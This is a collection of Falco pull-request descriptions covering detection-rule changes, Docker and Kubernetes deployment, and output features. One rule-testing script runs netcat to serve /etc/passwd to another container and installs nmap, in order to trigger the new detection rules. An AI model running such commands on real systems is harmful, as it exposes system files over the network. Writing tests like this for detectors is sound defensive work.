
Updated the Kubernetes example to provide an additional example: Daemon Set using RBAC and a ConfigMap for configuration. Also expanded the documentation for both the RBAC and non-RBAC examples.

Update K8S Daemon Set for RBAC & ConfigMap

---

CMakeLists.txt

Some versions of cmake include a libcurl that don't have ssl support,
and verifying the md5sums should be enough.

Use http dependencies

---

rules/falco_rules.yaml

Changes to reduce false positives as well as handling suggested use cases from customers.
@mattpag could you take a look at the last 2 commits (ssh/nodeport support?)

Rule updates 2018 02.v1

---

rules/falco_rules.yaml

Add the user_known_change_thread_namespace_binaries list to simplify the "Change thread namespace" rule tweaks.
This can be very useful to modify the "Change thread namespace" from the `falco_rules.local.yaml` file without copying the entire rule. I will use this new array to whitelist `calico`, our overlay network in our Kubernetes cluster, which was raising:
```JSON
{
"output": "15:18:23.416545428: Notice Namespace change (setns) by unexpected program (user=root command=calico  parent=calico k8s.pod=<NA> container=host)",
"priority": "Notice",
"rule": "Change thread namespace",
"time": "2018-02-19T15:18:23.416545428Z",
"output_fields": {
"container.id": "host",
"evt.time": 1519053503416545428,
"k8s.pod.name": null,
"proc.cmdline": "calico ",
"proc.pname": "calico",
"user.name": "root"
} …
```

Add user_known_change_thread_namespace_binaries

---

docker/dev/Dockerfile

Take two, pass the CLA sign-off check!
`gdb` can be very useful when trying to debug some issues with Falco or Sysdig. Adding it in the base image will allow us to do things like:
```YAML
containers:
- name: falco
image: 'sysdig/falco:dev'
securityContext:
privileged: true
args:
- /usr/bin/gdb
- '-ex'
- 'run'
- '-ex'
- 'bt'
- '--args'
- /usr/bin/falco
- '-K'
- /var/run/secrets/kubernetes.io/serviceaccount/token
- '-k'
- 'https://kubernetes.default'
- '-pk'
```

Add gdb in the development Docker image (sysdig/falco:dev) to help debugging

---

examples/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap.yaml
examples/k8s-using-daemonset/k8s-without-rbac/falco-daemonset.yaml

Consolidating some changes originally raised in #296 and #295, but since then we documented rbac and
without-rbac methods, so mirroring the changes here.

Improvements to falco daemonset configuration

---

examples/puppet-module/README.md
examples/puppet-module/sysdig-falco/Gemfile
examples/puppet-module/sysdig-falco/README.md
examples/puppet-module/sysdig-falco/Rakefile
examples/puppet-module/sysdig-falco/manifests/config.pp
examples/puppet-module/sysdig-falco/manifests/init.pp
examples/puppet-module/sysdig-falco/manifests/install.pp
examples/puppet-module/sysdig-falco/manifests/service.pp
examples/puppet-module/sysdig-falco/metadata.json
examples/puppet-module/sysdig-falco/spec/classes/init_spec.rb
examples/puppet-module/sysdig-falco/spec/spec_helper.rb
examples/puppet-module/sysdig-falco/templates/falco.yaml.erb
examples/puppet-module/sysdig-falco/tests/init.pp

Add an example puppet module for falco. This module configures the main
falco configuration file /etc/falco/falco.yaml, providing templates for
all configuration options.
It installs falco using debian/rpm packages and installs/manages it as a
systemd service.
This fixes https://github.com/draios/falco/issues/115.

Example puppet module for falco

---

rules/falco_rules.yaml

Various rule improvements to address false positives.

Rule updates 2018 02.v3

---

userspace/falco/lua/output.lua

And use consistent indentation.
I'm pretty sure this is behind the issue I mentioned earlier today in Slack: I got strange behavior (opening multiple copies of the same program) with `keep_alive` program output, but only when I was also using file output.
cc @wjwoodson @sharms

Use distinct names for file and program output pointers.

---

test/falco_tests.yaml
test/rules/append_single_rule.yaml
userspace/engine/lua/rule_loader.lua

If a rule has an append attribute but the original rule was skipped (due
to having lower priority than the configured priority), silently skip
the appending rule instead of returning an error.
This fixes https://github.com/draios/falco/issues/305.

Allow append skipped rules

---

examples/logrotate/falco
falco.yaml
userspace/falco/falco.cpp
userspace/falco/falco_outputs.cpp
userspace/falco/falco_outputs.h
userspace/falco/lua/output.lua

Add ability to close/reopen outputs on SIGUSR1, and add a logrotate example that relies on it.
This fixes https://github.com/draios/falco/issues/266

Rotate logs

---

cpack/debian/conffiles
falco.yaml
rules/CMakeLists.txt
test/falco_tests.yaml
test/rules/rules_dir/000-single_rule.yaml
test/rules/rules_dir/001-double_rule.yaml
userspace/falco/configuration.cpp
userspace/falco/configuration.h
userspace/falco/falco.cpp

When the argument to -r <path> or an entry in falco.yaml's rules_file
list is a directory, read all files in the directory and add them to the
rules file list. The files in the directory are sorted alphabetically
before being added to the list.
The installed falco adds directories /etc/falco/rules.available and
/etc/falco/rules.d and moves /etc/falco/application_rules.yaml to
/etc/falco/rules.available. /etc/falco/rules.d is empty, but the idea is
that admins can symlink to /etc/falco/rules.available for applications
they want to enable.
This will make it easier to add application-specific rulesets that
admins can opt-in to.
This fixes #187.

Add ability to read rules files from directories

---

userspace/falco/falco.cpp

To further reduce falco's cpu usage, start setting the inspector in
"autodrop" mode with a sampling ratio of 1. When autodrop mode is
enabled, a second class of events (those having EF_ALWAYS_DROP in the
syscall table, or those syscalls that do not have specific handling in
the syscall table) are also excluded.

Start setting autodrop, which filters addl events

---

rules/falco_rules.yaml

- To monitor file/dirs removed with `unlinkat` we need to check `evt.abspath`, not `evt.arg[1]`
- Monitor `renameat` too

Fix/Expand "Modify bin dirs" rule

---

docker/event-generator/event_generator.cpp
rules/falco_rules.yaml

New rule Unexpected UDP Traffic checks for udp traffic not on a list of
expected ports. Currently blocked on
https://github.com/draios/falco/issues/308.

Add Rule for unexpected udp traffic

---

test/falco_test.py
test/falco_tests.yaml
test/rules/catchall_order.yaml
userspace/engine/lua/compiler.lua
userspace/engine/lua/rule_loader.lua

Testing fix for https://github.com/draios/falco/issues/354 as well as some other minor improvements that allow suppressing evttype warnings for a given rule.

Add tests catchall order

---

userspace/falco/falco.cpp

When run with -i, print out all ignored syscalls/event names and exit.

Print ignored events/syscalls with -i

---

docker/dev/Dockerfile
docker/local/Dockerfile
docker/stable/Dockerfile

Propagating Dockerfile changes from https://github.com/draios/sysdig/commit/b1e94b81a4ea83f158f869ff7210e3be40ba92fe to the Dockerfiles in the falco repo per https://github.com/coreos/bugs/issues/2415#issuecomment-385498439.
This change adds `libc6-dev` and `libelf-dev` to the list of packages we apt-get install in the docker container for Falco. This is required for dynamic kernel module compilation on the latest CoreOS Container Linux.
Fixed up the ordering on the package names while in here (sorry for the noise).

Don't make driver compilation fail when kernel is compiled with CONFIG_ORC_UNWINDER or CONFIG_STACK_VALIDATION

---

.travis.yml
docker/dev/Dockerfile
docker/local/Dockerfile
docker/stable/Dockerfile

This PR supports eBPF for Falco. No special changes to the code are needed as long as Falco gets built with an eBPF-enabled libscap (now on sysdig/dev). One can simply set the environment variable `SYSDIG_BPF_PROBE` as described in https://github.com/draios/sysdig/wiki/eBPF-(beta) and everything will work:
```
gianluca@sid:~$ docker run -i -t --rm --name falco --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --net=host -e SYSDIG_BPF_PROBE="" falco
* Setting up /usr/src links from host
* Mounting debugfs
Found kernel config at /host/boot/config-4.17.0-rc3+
* Trying to compile BPF probe falco-probe-bpf …
```

eBPF support for Falco

---

userspace/engine/lua/rule_loader.lua
userspace/falco/falco.cpp

Make sure rules are proactively enabled rather than only disabled. This unbreaks falco for the dev branch.

Enable all rules

---

COPYING
README.md

Hello! 👋
(CCing @dankohn who has requested this work so that the license will appear correctly in https://landscape.cncf.io/selected=sysdig-falco)
(Please see the corresponding PR for the Sysdig repo: https://github.com/draios/sysdig/pull/1104)
GitHub uses a library called Licensee to identify a project's license
type. It shows this information in the status bar and via the API if it
can unambiguously identify the license.
This commit updates the COPYING file so that it contains only the full
text of the GPL 2.0 license. The info that pertains to OpenSSL has now
been moved to the "License Terms" section in the README.
Collectively, these changes allow Licensee to successfully identify the
license type of Falco as GPL 2.0.

edit Falco license info so that GitHub recognizes it

---

integrations/anchore-falco/Dockerfile
integrations/anchore-falco/Pipfile
integrations/anchore-falco/Pipfile.lock
integrations/anchore-falco/README.md
integrations/anchore-falco/actions.py
integrations/anchore-falco/infrastructure.py
integrations/anchore-falco/main.py
integrations/anchore-falco/specs/create_falco_rule_from_anchore_policy_results_spec.py
integrations/anchore-falco/specs/infrastructure/anchore_client_spec.py

This integration queries anchore-engine and generates a Falco rule based on images with negative policy evaluation result. So that, if we are trying to run an image with a bad evaluation from Anchore, Falco will notice and alert us.

Add integration between Falco and Anchore

---

docker/dev/Dockerfile
docker/local/Dockerfile
docker/stable/Dockerfile

If /lib/modules exists in the base image, the symlink will get created at
/lib/modules/modules. This removes any existing empty directory but will
fail if we try to remove a non-empty /lib/modules. (Punting on how to
handle non-empty base image dirs for now)
I'm propagating the changes from draios/agent-rhel#3. They aren't needed immediately for the debian base image, but it doesn't hurt, protects against future changes, and keeps the dockerfiles uniform.

[SMAGENT-968] Ensure the /lib/modules symlink to /host/lib/modules is set correctly

---

docker/dev/Dockerfile
docker/local/Dockerfile
docker/stable/Dockerfile

debian:unstable head contains binutils 2.31, which generates binaries
that are incompatible with kernels < 4.16.
To fix this, after installing everything, downgrade binutils to
2.30-22. This has to be done as the last step as it introduces conflicts
in other dependencies of the various gcc versions and some of the
packages already in the image.
This fixes #394

Downgrade binutils in docker image

---

CMakeLists.txt

Falco counterpart of https://github.com/draios/sysdig/pull/1213.
As for the sysdig PR, once the PR is approved the download URL for TBB has to be changed to point under `download.draios.com`.

Add TBB dependency

---

rules/falco_rules.yaml

Add weave-net (https://www.weave.works/oss/net/) to the list of k8s_binaries
falco-CLA-1.0-signed-off-by: Guido García <palmerabollo@gmail.com>

feat: add weave-net to the list of k8s_binaries

---

integrations/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap.yaml
integrations/k8s-using-daemonset/k8s-without-rbac/falco-daemonset.yaml

As Falco was accepted as a Sandbox project by the CNCF, there is a new organization called *falcosecurity* in DockerHub which holds the images for Falco.
Use these images in Kubernetes manifests.

Pull image from falcosecurity

---

examples/nodejs-bad-rest-api/README.md
examples/nodejs-bad-rest-api/demo.yml
examples/nodejs-bad-rest-api/package.json

Update the express version to mitigate some security vulnerabilities.
Update the port to match the one used by demo.yml.
Change to /usr/src/app so npm install works as expected.

Update nodejs example

---

integrations/kubernetes-response-engine/sysdig-capturer/Dockerfile
integrations/kubernetes-response-engine/sysdig-capturer/Makefile
integrations/kubernetes-response-engine/sysdig-capturer/docker-entrypoint.sh

This is useful for dropping captures in host, without need of an AWS account.
For example, in some workshops.

Allow that sysdig/capturer used in Kubernetes Response Engine uses volumes

---

docker/dev/Dockerfile
docker/local/Dockerfile
docker/stable/Dockerfile

It may be useful as a way to enable generic event forwarding.
This fixes https://github.com/falcosecurity/falco/issues/433.

Add netcat to docker images

---

userspace/falco/falco.cpp

Add a signal handler for SIGHUP that sets a global variable g_restart.
All the real execution of falco was already centralized in a standalone
function falco_init(), so simply exit on g_restart=true and call
falco_init() in a loop that restarts if g_restart is set to true.
Take care to not daemonize more than once and to reset the getopt index
to 1 on restart.
This fixes https://github.com/falcosecurity/falco/issues/432.

Restart falco on SIGHUP.

---

scripts/debian/falco
scripts/rpm/falco

When falco is started, load the kernel module. (The falco binary also
will do a modprobe if it can't open the inspector, as a backup).
When falco is stopped, unload the kernel module.
This fixes https://github.com/falcosecurity/falco/issues/418.

Load/unload kernel module on start/stop

---

README.md

As Falco was accepted as a Sandbox project by the CNCF, there is a new organization called falcosecurity in Travis CI which holds the build jobs for Falco.
falco-CLA-1.0-signed-off-by: Jintao Zhang <zhangjintao9020@gmail.com>

Update repo links.

---

rules/falco_rules.yaml

To test this PR:
1. Checkout the branch
2. Launch falco container with the updated falco rule yaml file
3. Run the following script:
```
#!/bin/bash
set -eux 
client=$(docker run -d --name client kaizheh/nginx-docker)
server=$(docker run -d --name server kaizheh/nginx-docker)
docker exec server bash -c "apt-get update && apt-get -y install nmap"
docker exec server bash -c "nc -lp 1234 -c 'cat /etc/passwd'" &
server_ip=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' $server)
docker exec client bash -c "nc $server_ip 1234"
```
To verify the output from falco container:
> 18:22:08.037417144: Error Package management process launched (user=root command=apt-get update container_id=7a222f00f4d0 container_name=server image=kaizheh/nginx-docker)
18:22:09.249714486: …

Kh add process rules

---

falco.yaml
rules/k8s_audit_rules.yaml

Add k8s audit rules to falco's config so they are read by default.
Rename some generic macros like modify, create, delete in the k8s audit
rules so they don't overlap with macros in the main rules file.

Make k8s-audit rules and main rules compatible

---

userspace/engine/ruleset.cpp

It's possible to call event_tags_for_ruleset/evttypes_for_ruleset for a
ruleset that hasn't been loaded. In this case, it's possible to go past
the end of the m_rulesets array.
After fixing that, it's also possible to go past the end of the
event_tags array in event_tags_for_ruleset().
So in both cases, check the index against the array size before
indexing.

Avoid going past end of ruleset/etag arrays

---

integrations/kubernetes-response-engine/deployment/cncf/cluster-role-binding.yaml

I remove it for avoiding breaking stuff.

This apiGroup is not needed on the CNCF flavor deployment

---

CMakeLists.txt
userspace/falco/falco_outputs.cpp

The -Wextra compile-time option will enable additional diagnostic
warnigns.  The -Werror option will cause the compiler to treat warnings
as errors.  This change adds a build time option,
BUILD_WARNINGS_AS_ERRORS, to conditionally enable those flags.  Note
that depending on the compiler you're using, if you enable this option,
compilation may fail (some compiler version have additional warnings
that have not yet been resolved).
Testing with these options in place identified a destructor that was
throwing an exception.  C++11 doesn't allow destructors to throw
exceptions, so those throw's would have resulted in calls to
terminate().  I replace them with an error log and a call to assert().

Add optional support for -Wextra and -Werror

---

userspace/falco/falco.cpp

Fixing #413. The request to also include cluster name isn't possible right now as that's not a field we are collecting from the Kubernetes API Server, and requires more code changes than this fix.

Add k8s.ns.name to output when -pk flag passed

---

rules/falco_rules.yaml

A duplicate of the changes in #461, but this time targeted against the dev branch so the changes don't get lost.

Kh add process rules v2

---

falco.yaml
userspace/falco/configuration.cpp

In the common case, falco doesn't generate much output, so it's
desirable to not buffer it in case you're tail -fing some logs.
So change the default for buffered outputs to false.

Unbuffer outputs by default

---

userspace/engine/lua/rule_loader.lua

Currently, -pc/-pk results in extra fields added to the output field of
all rules. They should only be added for syscall rules.

Only have -pc/-pk apply to syscall rules

---

integrations/kubernetes-response-engine/deployment/aws/outputs.tf

As long as we are using rbac for allowing actions on several resources,
we can restrict this a bit more.

Remove kubernetes-response-engine from system:masters

---

examples/k8s_audit_config/README.md
examples/k8s_audit_config/webhook-config.yaml.in
integrations/k8s-using-daemonset/README.md
integrations/k8s-using-daemonset/k8s-with-rbac/falco-account.yaml
integrations/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap.yaml
integrations/k8s-using-daemonset/k8s-with-rbac/falco-service.yaml

Docs changes that create a falco service when used with k8s, and use falco running within k8s to show off audit log support.
@markyjackson-taulia these instructions will probably be very useful to you. There are some caveats related to kernel modules that I can discuss with you offline.

Add falco service k8s

---

CMakeLists.txt

A recent sysdig change added support for CRI and also added new external
dependencies (cri uses grpc to communicate between the client/server).
Add those dependencies.

Add c-ares, protobuf and grpc dependencies

---

README.md

Add CII best practices badge for #428.

add cii best practices badge

---

docker/dev/Dockerfile
docker/local/Dockerfile
docker/stable/Dockerfile

gcc 5 is no longer included in debian unstable, but we need it to build
centos kernels, which are 3.x based and explicitly want a gcc version 3,
4, or 5 compiler.
So grab copies we've saved from debian snapshots with the prefix
https://snapshot.debian.org/archive/debian/20190122T000000Z. They're
stored at downloads.draios.com and installed in a dpkg -i step after the
main packages are installed, but before any other by-hand packages are
installed.

Add gcc 5 by hand rather than from debian unstable

---

integrations/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap.yaml

Fixes #473.
This is required to support COS and Minikube as the probe loader script looks for the OS version by reading files in /etc.
I also added the environment variables to enable the eBPF probe, but left them commented out.

Add /etc mount for falco container

---

.gitignore
falco.yaml
userspace/falco/configuration.cpp
userspace/falco/configuration.h
userspace/falco/falco.cpp
userspace/falco/webserver.cpp

Allow enabling SSL for the Kubernetes audit log web server. This required adding two new configuration options: `webserver.ssl_enabled` and `webserver.ssl_certificate`. To enable SSL add the below to the `webserver` section of the `falco.yaml` config:
```
webserver:
enabled: true
listen_port: 8765s
k8s_audit_endpoint: /k8s_audit
ssl_enabled: true
ssl_certificate: /etc/falco/falco.pem
```
Note that the port number has an `s` appended to indicate SSL for the port which is how civetweb expects SSL ports be denoted. We could change this to dynamically add the `s` if `ssl_enabled: true`.
The `ssl_certificate` is a combination SSL Certificate and corresponding key contained in a single file. You can generate a key/cert as follows:
```
$ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 …
```

Allow SSL for k8s audit endpoint

---

userspace/engine/json_evt.h

As per https://github.com/draios/sysdig/pull/1275, the gen_event class
mandate the implementation of two new methods.
This change aims to simplify the implementation of a generic event
processing infrastructure, that could handle both sinsp and json
events.

Implementing required gen_event virtual methods

---

.travis.yml
rules/application_rules.yaml
rules/falco_rules.yaml
rules/k8s_audit_rules.yaml
test/falco_tests.yaml
test/rules/engine_version_mismatch.yaml
userspace/engine/falco_engine.cpp
userspace/engine/falco_engine.h
userspace/engine/falco_engine_version.h
userspace/engine/lua/rule_loader.lua
userspace/engine/rules.cpp
userspace/engine/rules.h
userspace/falco/CMakeLists.txt
userspace/falco/falco.cpp
userspace/falco/verify_engine_fields.sh

Changes to explicitly track the version of both the falco engine and a rules file loaded by the engine. See https://github.com/falcosecurity/falco/wiki/Falco-Rules#versioning for more details.
This depends on 
https://github.com/draios/sysdig/pull/1288.

Rules versioning

---

.github/stale.yaml

We have lots of issues that linger because we don't hear anything from the community member after we respond. In order to have these issues automatically closed, many projects use the Probot/Stale bot to close stale issues. This PR enables the bot to treat issues with no activity after 60 days as stale, and closes issues after 67 days if no activity has occurred on them.

Add Stale Issue Probot

---

rules/falco_rules.yaml

Instead of using `container.image`, that always reports the raw string used to spawn the container, switch to the more reliable `container.image.`{`repository`,`tag`}, since they are guaranteed to report the actual repository/tag of the container image.
This also give a little performance improvement (and better looking rules) since a single 'in' predicate can now be used instead of a sequence of startswith.
I've avoided to refactor user macros like `user_trusted_containers` to a single `in` predicate with a list ready to be overridden because, based on the specific use case, additional predicates might be needed (e.g. checking for additional repositories/registry just by prefix) but @mstemm let me know if you think otherwise and it's worth to simplify them.

Update rules to use more reliable container image predicates

---

integrations/k8s-using-daemonset/k8s-with-rbac/falco-account.yaml

Falco also needs to list/watch replicasets, daemonsets, and deployments,
so add them to the resources list.

Add additional k8s rbac resources

---

userspace/engine/falco_engine.cpp
userspace/engine/falco_engine.h
userspace/engine/lua/rule_loader.lua
userspace/engine/rules.cpp
userspace/engine/rules.h
userspace/falco/falco.cpp

Add the ability to dump required support information with a `--support` commandline argument.

Add support bundle

---

docker/dev/Dockerfile
docker/local/Dockerfile
docker/stable/Dockerfile

Debian:unstable recently removed gcc 6, so remove it from our Dockerfiles.

Remove gcc 6.

---

docker/builder/Dockerfile
docker/builder/entrypoint.sh

To allow for a more portable build environment, create a builder image
that is based on centos 6 with devtoolset-2 for a refrence g++.
In that image, install all required packages and run a script that can
either run cmake or make.
The image depends on the following parameters:
FALCO_VERSION: the version to give any built packages
BUILD_TYPE: Debug or Release
BUILD_DRIVER/BPF: whether or not to build the kernel module/bpf program when
building. This should usually be OFF, as the kernel module would be
built for the files in the centos image, not the host.
BUILD_WARNINGS_AS_ERRORS: consider all build warnings fatal
MAKE_JOBS: passed to the -j argument of make
A typical way to run this builder is the following. Assumes you have
checked out falco and sysdig to directories below …

Docker-based way to build falco

---

falco.yaml
userspace/falco/configuration.cpp
userspace/falco/falco_outputs.cpp
userspace/falco/falco_outputs.h
userspace/falco/lua/output.lua

Adding a simple HTTP handler that allows you to post JSON output directly to a HTTP endpoint instead of the current method of using the program output and curl. 
This was implemented in C++ and the outputs.lua calls back into C++ to handle the the http post using libcurl. 
This can be enabled by setting the `http_output` option in `falco.yaml` to `enabled: true`.
```
http_output:
enabled: true
url: http://some.url/you/post/to
```

Add HTTP output handler

---

examples/k8s_audit_config/README.md
examples/k8s_audit_config/apiserver-config.patch.sh
examples/k8s_audit_config/enable-k8s-audit.sh

Also reorder the steps so falco is fully deployed before modifying the
apiserver configuration.

Add k8s audit instructions for kops

---

docker/dev/Dockerfile
docker/local/Dockerfile
docker/stable/Dockerfile

Related to https://github.com/falcosecurity/falco/pull/526, it turns out
attempting to build a kernel module on the default debian-based ami used
by kops tries to invoke gcc-6:
-----
* Setting up /usr/src links from host
* Unloading falco-probe, if present
* Running dkms install for falco
Kernel preparation unnecessary for this kernel.  Skipping...
Building module:
cleaning build area...
make -j8 KERNELRELEASE=4.9.0-7-amd64 -C /lib/modules/4.9.0-7-amd64/build
M=/var/lib/dkms/falco/0.14.0/build...(bad exit status: 2)
Error! Bad return status for module build on kernel:
4.9.0-7-amd64 (x86_64)
Consult /var/lib/dkms/falco/0.14.0/build/make.log for more information.
* Running dkms build failed, dumping
/var/lib/dkms/falco/0.14.0/build/make.log
DKMS make.log for falco-0.14.0 for kernel …

Add gcc back from manual packages

---

integrations/k8s-using-daemonset/README.md

Fix below issue when os does not have falco ko:
```
* Setting up /usr/src links from host
* Unloading falco-probe, if present
* Running dkms install for falco
Kernel preparation unnecessary for this kernel.  Skipping...
Building module:
cleaning build area...
make -j8 KERNELRELEASE=3.10.0-693.el7.centos.test.x86_64 -C /lib/modules/3.10.0-693.el7.centos.test.x86_64/build M=/var/lib/dkms/falco/0.1.2611dev/build...
cleaning build area...
DKMS: build completed.
falco-probe.ko.xz:
Running module version sanity check.
- Original module
- No original module exists within this kernel
- Installation
- Installing to /lib/modules/3.10.0-693.el7.centos.test.x86_64/kernel/extra/
mkdir: cannot create directory '/lib/modules/3.10.0-693.el7.centos.test.x86_64/kernel/extra': Read-only file system
cp: …
```

fix k8s install issue

---

falco.yaml

Fix below issue:
when config with mail:
```
program_output:
enabled: true
keep_alive: false
program: mail -s "Falco Notification" 764524258@qq.com
```
```
16:07:24.426355331: Informational Container with sensitive mount started (user=root command=runc:[1:CHILD] init k8s.ns=<NA> k8s.pod=<NA> container=95d852f177a5 image=sysdig/falco-event-generator@sha256:8be9e858ed798bb41c22601ba80f552244f50e452505a2eb34c3e1c82369b343 mounts=/var/lib/kubelet/pods/641309ac-25f8-11e9-8f73-1e00130014eb/volumes/kubernetes.io~secret/default-token-bp7qk:/var/run/secrets/kubernetes.io/serviceaccount:ro:false:rprivate,/var/lib/kubelet/pods/641309ac-25f8-11e9-8f73-1e00130014eb/etc-hosts:/etc/hosts::true:rprivate,/var/lib/kubelet/pods/641309ac-25f8-11e9-8f73-1e00130014eb/containers/falco-event-generator/76eff74a:/de …
```

update program_output example

---

integrations/puppet-module/sysdig-falco/Gemfile
integrations/puppet-module/sysdig-falco/README.md
integrations/puppet-module/sysdig-falco/manifests/config.pp
integrations/puppet-module/sysdig-falco/manifests/init.pp
integrations/puppet-module/sysdig-falco/manifests/install.pp
integrations/puppet-module/sysdig-falco/manifests/params.pp
integrations/puppet-module/sysdig-falco/manifests/service.pp
integrations/puppet-module/sysdig-falco/metadata.json
integrations/puppet-module/sysdig-falco/spec/classes/init_spec.rb
integrations/puppet-module/sysdig-falco/templates/falco.yaml.erb

Greetings!
I noticed the Puppet module is a little outdated compared to this repository. I also noticed the installation was not working because the DEB repository was not managed by this module. This PR should fix that!
A list of the changes:
\* Apply puppet-lint recommendations
\* Update the README since the project moved from `draios` to `falcosecurity` in GitHub
\* Move parameters in their own file
\+ Add the DEB repository automatically (based on https://github.com/garethr/garethr-sysdig/blob/master/manifests/install.pp)
\+ Add the EPEL repository automatically (based on https://github.com/garethr/garethr-sysdig/blob/master/manifests/install.pp)
\+ Add a `logrotate` configuration
\* Update the configuration file with all the latest updates
🆘 Please note that I'm not a Puppet expert 😄 …

Update the Puppet module

---

integrations/puppet-module/sysdig-falco/metadata.json

0.2.0 was released as a part of testing an early version in
https://github.com/falcosecurity/falco/pull/537, and can't be
overwritten, so publish as 0.3.0.

Update version to 0.3.0

---

GOVERNANCE
docker/builder/entrypoint.sh
examples/bad-mount-cryptomining/attacker_files/minerd
examples/bad-mount-cryptomining/demo.yml
integrations/k8s-using-daemonset/README.md
scripts/rpm/falco
test/rules/macro_order.yaml
test/run_performance_tests.sh
userspace/falco/falco_outputs.cpp

falco-CLA-1.0-signed-off-by: Xiang Dai <764524258@qq.com>

delete all duplicate empty blanks

---

integrations/puppet-module/sysdig-falco/manifests/init.pp
integrations/puppet-module/sysdig-falco/manifests/install.pp
integrations/puppet-module/sysdig-falco/manifests/repo.pp
integrations/puppet-module/sysdig-falco/manifests/service.pp
integrations/puppet-module/sysdig-falco/metadata.json

Greetings,
We created a simple class that calls the `falco` class:
```RUBY
#
#
class profile::security::falco::install (
$log_level       = 'info',
$package_ensure  = 'installed',
$service_ensure  = 'running',
$service_enable  = true,
$service_restart = true,
) {
$falco_config_folder = '/etc/falco'
Class [ '::falco' ]
-> File [ "$falco_config_folder/falco_rules.local.yaml" ]
~> Service['falco']
class { '::falco':
log_level       => $log_level,
log_stderr      => false,
json_output     => true,
syslog_output   => {
'enabled' => false
},
file_output     => {
'enabled'    => true,
'keep_alive' => true,
'filename'   => '/var/log/falco-events.log'
},
stdout_output   => {
'enabled' => false
},
package_ensure  => $package_ensure,
service_ensure  => $service_ensure,
service_enable  => …
```

Puppet module fixes

---

integrations/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap.yaml

When using host network, the containers can't resolve kubernetes.default, thus not getting the metadata like pod name, namespace, etc. Using the environment variable KUBERNETES_SERVICE_HOST, which points to the current cluster API server, will allow that.

Add KUBERNETES_SERVICE_HOST

---

rules/falco_rules.yaml

Greetings!
When building a Docker container image from a Jenkins container running in Kubernetes, we get:
```JSON
{
"container.id": "host",
"evt.time": 1551362688881207853,
"fd.name": "/var/lib/rpm/Sigmd5",
"k8s.ns.name": null,
"k8s.pod.name": null,
"proc.cmdline": "exe /var/lib/docker/overlay2/67a775b844bc804f5e268e08c1e0bbc67fd4f2e4c23b3edaf2a2ef9043e49982/diff",
"proc.pcmdline": "dockerd -H fd:// --ip-masq=false --iptables=false --log-driver=json-file --log-level=warn --log-opt=max-file=5 --log-opt=max-size=10m --storage-driver=overlay2",
"proc.pname": "dockerd"
}
```
That alert is confusing because it says `exe` is writhing in `/var/lib/rpm` on the `host`. What is really happening is Docker building an image.
Adding `and not exe_running_docker_save` in the `Write below rpm database` …

Allow exe_running_docker_save in the "Write below rpm database" rule

---

rules/falco_rules.yaml

Greetings!
Falco is currently whitelisting multiple processes to write below `/etc` and Puppet was not one of them. Adding Puppet to the list of allowed `proc.name` will remove multiple false positives.
On top of that, I added the `user_known_write_root_conditions` and the `user_known_non_sudo_setuid_conditions` macros, so users can add their own condition without overriding the official Falco rules file.
Changes:
+ Add "puppet" in the list of known `proc.name` writing below etc because Puppet often manages configurations
+ Add the user_known_write_root_conditions macro to allow custom conditions in the "Write below root" rule
+ Add the user_known_non_sudo_setuid_conditions to allow custom conditions in the "Non sudo setuid" rule
falco-CLA-1.0-contributing-entity: Coveo Solutions Inc. …

Puppet write below /etc and new user_known_x macros!

---

rules/falco_rules.yaml

Greetings!
`prometheus-conf` started to appear in Falco events as "Write below etc" after an upgrade:
```JSON
{
"container.id": "2d3204ad6f6a",
"evt.time": 1552573221328947059,
"fd.name": "/etc/prometheus/config_out/rules.tmp/rules-0/system.rules",
"k8s.ns.name": "monitoring",
"k8s.pod.name": "prometheus-prometheus-1",
"proc.aname[2]": "docker-containe",
"proc.aname[3]": "dockerd",
"proc.aname[4]": "systemd",
"proc.cmdline": "prometheus-conf --reload-url=http://localhost:9090/-/reload --config-file=/etc/prometheus/config/prometheus.yaml --rule-list-file=/etc/prometheus/config/configmaps.json --config-envsubst-file=/etc/prometheus/config_out/prometheus.env.yaml --rule-dir=/etc/prometheus/config_out/rules",
"proc.name": "prometheus-conf",
"proc.pcmdline": "docker-containe …
```

! Fix the prometheus_conf_writing_conf macro

---

rules/falco_rules.yaml

Add a user_known_write_monitored_dir_conditions macro to allow custom conditions in the "Write below monitored dir" rule. 
For example, with this macro, we can allow the root user to connect to BitBucket using SSH:
```YAML
- macro: user_known_write_monitored_dir_conditions
condition: >
fd.name startswith /root/.ssh and proc.cmdline="ssh hg@bitbucket.org hg -R some/repo serve --stdio"
```
falco-CLA-1.0-contributing-entity: Coveo Solutions Inc.
falco-CLA-1.0-signed-off-by: Jean-Philippe Lachance <jplachance@coveo.com>

Add user_known_write_monitored_dir_conditions

---

rules/falco_rules.yaml
test/falco_traces.yaml.in

In the container_started macro, ensure that the container metadata is
complete after either the container event (very unlikely) or after the
exec of the first process into the container (very likely now that
container metadata fetches are async).
When using these rules with older falco versions, this macro will still
work as the synchronous container metadata fetch will result in a
repository that isn't "incomplete".

Skip incomplete container info for container start

---

userspace/falco/event_drops.cpp
userspace/falco/event_drops.h
userspace/falco/falco.cpp

When creating syscall event drop alerts, instead of including just the
total and dropped event count, include all possible causes of drops as
well as whether bpf is enabled.

Include addl info to syscall event drop alerts

---

docker/dev/Dockerfile
docker/local/Dockerfile
docker/stable/Dockerfile
falco.yaml
test/falco_test.py
test/falco_tests.yaml
userspace/engine/falco_engine_version.h
userspace/engine/json_evt.cpp
userspace/engine/json_evt.h
userspace/falco/configuration.cpp
userspace/falco/configuration.h
userspace/falco/falco.cpp
userspace/falco/falco_outputs.cpp
userspace/falco/falco_outputs.h
userspace/falco/logger.cpp
userspace/falco/logger.h
userspace/falco/lua/output.lua

This prevents ambiguity when, say, running falco in a container, which
may have a different /etc/localtime than the host system.

Change log timestamp to ISO8601 w/ timezone

---

rules/falco_rules.yaml

Added MITRE tags for default falco rules

rule update: add MITRE tags for rules

---

userspace/engine/formats.cpp

This should fix #560. Tested and confirmed json output doesn't get escaped after multiple alerts.

fix regression that broke json output

---

CMakeLists.txt
userspace/falco/falco_outputs.h

